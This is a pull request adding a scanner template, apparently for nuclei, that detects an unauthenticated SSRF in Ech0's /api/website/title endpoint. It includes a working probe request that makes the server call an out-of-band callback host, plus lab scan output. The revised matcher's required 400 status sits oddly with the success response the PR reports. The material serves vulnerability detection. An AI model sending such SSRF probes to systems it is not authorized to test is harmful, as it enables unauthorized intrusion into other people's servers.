### PR TITLE
Add CVE-2026-35037 Ech0 SSRF template

### DIFF
--- a/http/cves/2026/CVE-2026-35037.yaml
+++ b/http/cves/2026/CVE-2026-35037.yaml
@@ -1,0 +1,36 @@
+id: CVE-2026-35037
+
+info:
+  name: Ech0 < 4.2.8 - Server-Side Request Forgery
+  author: fineman999
+  severity: high
+  description: |
+    Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in
+    GET /api/website/title. The website_url query parameter is fetched
+    server-side without validating the target host or IP address.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-35037
+    - https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc
+  classification:
+    cve-id: CVE-2026-35037
+    cwe-id: CWE-918
+    cvss-score: 7.2
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+  metadata:
+    verified: true
+    vendor: lin-snow
+    product: ech0
+    max-request: 1
+  tags: cve,cve2026,ech0,ssrf,oast,lin-snow
+
+http:
+  - raw:
+      - |
+        GET /api/website/title?website_url=http://{{interactsh-url}}/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"

--- a/http/cves/2026/CVE-2026-35037.yaml
+++ b/http/cves/2026/CVE-2026-35037.yaml
@@ -5,12 +5,10 @@ info:
   author: fineman999
   severity: high
   description: |
-    Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in
-    GET /api/website/title. The website_url query parameter is fetched
-    server-side without validating the target host or IP address.
+    Ech0 before 4.2.8 exposes an unauthenticated SSRF vulnerability in GET /api/website/title. The website_url query parameter is fetched server-side without validating the target host or IP address.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-35037
     - https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-35037
   classification:
     cve-id: CVE-2026-35037
     cwe-id: CWE-918
@@ -21,7 +19,9 @@ info:
     vendor: lin-snow
     product: ech0
     max-request: 1
-  tags: cve,cve2026,ech0,ssrf,oast,lin-snow
+    shodan-query: title:"Ech0"
+    fofa-query: title:"Ech0"
+  tags: cve,cve2026,ech0,ssrf,oast,oss
 
 http:
   - raw:
@@ -30,7 +30,10 @@ http:
         Host: {{Hostname}}
 
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
+      - type: dsl
+        dsl:
+          - 'status_code == 400'
+          - 'contains(body, "data\":")'
+          - 'contains(interactsh_protocol, "http")'
+          - 'contains(content_type, "application/json")'
+        condition: and


### PR DESCRIPTION

### PR Information

Added a template for `CVE-2026-35037`, an unauthenticated SSRF vulnerability in Ech0's `GET /api/website/title` endpoint.

The template sends a single request with `website_url=http://{{interactsh-url}}/` and confirms server-side interaction through `interactsh_protocol`.

### Affected Versions

- GHSA lists affected versions as `<= 4.2.1`
- GHSA lists the patched version as `4.2.8`
- NVD describes affected versions as prior to `4.2.8`

### Validation

- Validated template syntax with `nuclei -validate`
- Reproduced in an isolated Docker lab against Ech0 `4.2.1`
- Confirmed Ech0 `4.2.1` fetched a controlled local evidence server and returned its title
- Compared against patched Ech0 `4.2.8`; the same unauthenticated controlled callback request returned `401 Unauthorized`
- Confirmed nuclei matched Ech0 `4.2.1` and returned no results against Ech0 `4.2.8`
- No third-party or production targets were used

### Reproduction Evidence

Vulnerable `v4.2.1` response from a controlled local evidence server:

```json
{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}
```

Nuclei validation:

```text
[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.

[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.
```

Patched `v4.2.8` returns `401 TOKEN_MISSING` on the same endpoint, which prevents the unauthenticated outbound request and explains why the nuclei template does not trigger against the patched version.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-35037
- https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc
- https://github.com/fineman999/POC_CVE-2026-35037